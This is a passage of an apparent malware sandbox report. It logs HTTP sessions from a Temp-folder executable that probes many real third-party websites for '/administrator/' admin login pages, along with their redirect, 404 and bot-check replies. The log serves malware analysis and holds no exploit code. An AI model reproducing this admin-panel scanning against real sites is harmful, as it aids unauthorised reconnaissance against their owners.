2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 Data Ascii: 595<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!!
Feb 21, 2024 00:26:06.903484106 CET	490	IN	Data Raw: 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b Data Ascii: []+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoad
Feb 21, 2024 00:26:06.903526068 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	52350	85.214.145.11	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.723001957 CET	176	OUT	GET /administrator/ HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.914792061 CET	397	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://braekling.de/administrator/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Feb 21, 2024 00:26:06.916560888 CET	185	OUT	GET /administrator/index.php HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.107741117 CET	406	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:07 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://braekling.de/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	52277	185.107.56.198	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.733237982 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.254025936 CET	927	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 485 content-type: text/html; charset=utf-8 date: Tue, 20 Feb 2024 23:26:06 GMT server: nginx set-cookie: sid=6bfceafb-d047-11ee-9fdb-b2ef13fb2d8a; path=/; domain=.att.com.ph; expires=Mon, 10 Mar 2092 02:40:14 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 61 74 74 2e 63 6f 6d 2e 70 68 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 77 4f 44 51 33 4f 44 63 32 4e 69 77 69 61 57 46 30 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 32 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 58 46 79 59 6d 78 72 5a 32 4a 76 4d 47 59 34 5a 33 42 74 4f 54 67 7a 64 47 63 31 62 7a 4d 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 44 67 30 4e 7a 45 31 4e 6a 59 73 49 6e 52 7a 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 32 4f 44 41 32 4e 6a 41 35 66 51 2e 55 37 46 59 73 78 36 4d 48 57 62 44 6f 45 79 64 34 64 45 73 39 4b 53 34 51 4c 7a 7a 30 4f 4e 76 46 6e 66 51 34 32 4a 78 68 6b 59 26 73 69 64 3d 36 62 66 63 65 61 66 62 2d 64 30 34 37 2d 31 31 65 65 2d 39 66 64 62 2d 62 32 65 66 31 33 66 62 32 64 38 61 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://att.com.ph/administrator/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcwODQ3ODc2NiwiaWF0IjoxNzA4NDcxNTY2LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydXFyYmxrZ2JvMGY4Z3BtOTgzdGc1bzMiLCJuYmYiOjE3MDg0NzE1NjYsInRzIjoxNzA4NDcxNTY2ODA2NjA5fQ.U7FYsx6MHWbDoEyd4dEs9KS4QLzz0ONvFnfQ42JxhkY&sid=6bfceafb-d047-11ee-9fdb-b2ef13fb2d8a');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	52276	81.169.145.86	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.734992981 CET	193	OUT	GET /administrator/ HTTP/1.1 Host: creativ-moebelwerkstaetten.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.911858082 CET	491	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache/2.4.58 (Unix) Location: https://creativ-moebelwerkstaetten.de/administrator/ Content-Length: 260 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://creativ-moebelwerkstaetten.de/administrator/">here</a>.</p></body></html>
Feb 21, 2024 00:26:06.913228035 CET	202	OUT	GET /administrator/index.php HTTP/1.1 Host: creativ-moebelwerkstaetten.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.089293957 CET	509	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache/2.4.58 (Unix) Location: https://creativ-moebelwerkstaetten.de/administrator/index.php Content-Length: 269 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://creativ-moebelwerkstaetten.de/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	52278	162.241.216.197	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.734992981 CET	189	OUT	GET /administrator/ HTTP/1.1 Host: wilsonfamilyinsurance.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.177263975 CET	226	IN	HTTP/1.1 409 Conflict Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Content-Length: 83 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	52349	218.213.216.154	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.736901999 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: att.com.hk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.039417982 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Last-Modified: Wed, 21 Mar 2018 06:16:02 GMT ETag: "696-567e62015ec80" Accept-Ranges: bytes Content-Length: 1686 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 35 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 32 45 38 31 41 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 7d 0a 20 20 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 70 78 20 30 20 32 34 70 78 20 30 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 36 36 36 3b 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>ERROR 404 - Not Found!</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex" /> <style type="text/css">... body { color: #444444; background-color: #EEEEEE; font-family: 'Trebuchet MS', sans-serif; font-size: 80%; } h1 {} h2 { font-size: 1.2em; } #page{ background-color: #FFFFFF; width: 60%; margin: 24px auto; padding: 12px; } #header { padding: 6px ; text-align: center; } .status3xx { background-color: #475076; color: #FFFFFF; } .status4xx { background-color: #C55042; color: #FFFFFF; } .status5xx { background-color: #F2E81A; color: #000000; } #content { padding: 4px 0 24px 0; } #footer { color: #666666;
Feb 21, 2024 00:26:07.039489985 CET	636	IN	Data Raw: 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 39 66 39 66 39 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 35 70 78 20 23 Data Ascii: background: #f9f9f9; padding: 10px 20px; border-top: 5px #efefef solid; font-size: 0.8em; text-align: center; } #footer a { color: #999999; } --></style></head><body> <div i
Feb 21, 2024 00:26:07.042956114 CET	226	OUT	GET /administrator/index.php HTTP/1.1 Host: att.com.hk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://att.com.hk/administrator/
Feb 21, 2024 00:26:07.345362902 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:07 GMT Server: Apache Last-Modified: Wed, 21 Mar 2018 06:16:02 GMT ETag: "696-567e62015ec80" Accept-Ranges: bytes Content-Length: 1686 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 35 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 32 45 38 31 41 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 7d 0a 20 20 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 70 78 20 30 20 32 34 70 78 20 30 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 36 36 36 3b 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>ERROR 404 - Not Found!</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex" /> <style type="text/css">... body { color: #444444; background-color: #EEEEEE; font-family: 'Trebuchet MS', sans-serif; font-size: 80%; } h1 {} h2 { font-size: 1.2em; } #page{ background-color: #FFFFFF; width: 60%; margin: 24px auto; padding: 12px; } #header { padding: 6px ; text-align: center; } .status3xx { background-color: #475076; color: #FFFFFF; } .status4xx { background-color: #C55042; color: #FFFFFF; } .status5xx { background-color: #F2E81A; color: #000000; } #content { padding: 4px 0 24px 0; } #footer { color: #666666;
Feb 21, 2024 00:26:07.345372915 CET	636	IN	Data Raw: 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 39 66 39 66 39 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 35 70 78 20 23 Data Ascii: background: #f9f9f9; padding: 10px 20px; border-top: 5px #efefef solid; font-size: 0.8em; text-align: center; } #footer a { color: #999999; } --></style></head><body> <div i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	52279	15.161.71.77	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.736905098 CET	182	OUT	GET /administrator/ HTTP/1.1 Host: iisalessandrini.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
